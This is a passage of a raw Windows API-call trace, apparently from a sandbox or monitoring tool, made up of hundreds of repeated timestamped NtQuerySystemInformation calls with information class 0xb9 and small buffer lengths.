NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd730, Length=0x28, ResultLength=0x0) [0218.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd730, Length=0x28, ResultLength=0x0) [0218.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd730, Length=0x28, ResultLength=0x0) [0218.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7a0, Length=0x28, ResultLength=0x0) [0218.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd900, Length=0x38, ResultLength=0x0) [0218.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd820, Length=0x28, ResultLength=0x0) [0218.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd820, Length=0x28, ResultLength=0x0) [0218.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd900, Length=0x38, ResultLength=0x0) [0218.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x20, ResultLength=0x0) [0218.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0218.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0218.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0218.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd900, Length=0x38, ResultLength=0x0) [0218.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x20, ResultLength=0x0) [0218.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd710, Length=0x20, ResultLength=0x0) [0218.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd710, Length=0x20, ResultLength=0x0) [0218.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e8, Length=0x58, ResultLength=0x0) [0218.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x38, ResultLength=0x0) [0218.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x28, ResultLength=0x0) [0218.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x28, ResultLength=0x0) [0218.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x28, ResultLength=0x0) [0218.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x28, ResultLength=0x0) [0218.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x28, ResultLength=0x0) [0218.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x38, ResultLength=0x0) [0218.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x38, ResultLength=0x0) [0218.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0218.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0218.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x38, ResultLength=0x0) [0218.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x38, ResultLength=0x0) [0218.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd660, Length=0x20, ResultLength=0x0) [0218.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x20, ResultLength=0x0) [0218.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x20, ResultLength=0x0) [0218.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x20, ResultLength=0x0) [0218.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd830, Length=0x20, ResultLength=0x0) [0218.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x38, ResultLength=0x0) [0218.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd750, Length=0x20, ResultLength=0x0) [0218.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x20, ResultLength=0x0) [0218.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x20, ResultLength=0x0) [0218.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x20, ResultLength=0x0) [0218.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x38, ResultLength=0x0) [0218.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd750, Length=0x20, ResultLength=0x0) [0218.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x20, ResultLength=0x0) [0218.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x20, ResultLength=0x0) [0218.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x20, ResultLength=0x0) [0218.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x38, ResultLength=0x0) [0218.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd750, Length=0x20, ResultLength=0x0) [0218.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x20, ResultLength=0x0) [0218.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x20, ResultLength=0x0) [0218.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e8, Length=0x58, ResultLength=0x0) [0218.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x58, ResultLength=0x0) [0218.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x38, ResultLength=0x0) [0218.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x28, ResultLength=0x0) [0218.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x28, ResultLength=0x0) [0218.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x28, ResultLength=0x0) [0218.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x28, ResultLength=0x0) [0218.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd670, Length=0x28, ResultLength=0x0) [0218.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x38, ResultLength=0x0) [0218.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x28, ResultLength=0x0) [0218.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x28, ResultLength=0x0) [0218.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x38, ResultLength=0x0) [0218.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x20, ResultLength=0x0) [0218.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0218.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0218.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0218.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x38, ResultLength=0x0) [0218.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x20, ResultLength=0x0) [0218.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x20, ResultLength=0x0) [0218.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x20, ResultLength=0x0) [0218.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x58, ResultLength=0x0) [0218.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x38, ResultLength=0x0) [0218.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x28, ResultLength=0x0) [0218.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x28, ResultLength=0x0) [0218.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x28, ResultLength=0x0) [0218.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x28, ResultLength=0x0) [0218.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd670, Length=0x28, ResultLength=0x0) [0218.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x38, ResultLength=0x0) [0218.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x28, ResultLength=0x0) [0218.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x28, ResultLength=0x0) [0218.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0218.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x20, ResultLength=0x0) [0218.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x20, ResultLength=0x0) [0218.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x20, ResultLength=0x0) [0218.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x38, ResultLength=0x0) [0218.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x38, ResultLength=0x0) [0218.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x20, ResultLength=0x0) [0218.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x20, ResultLength=0x0) [0218.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x20, ResultLength=0x0) [0218.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 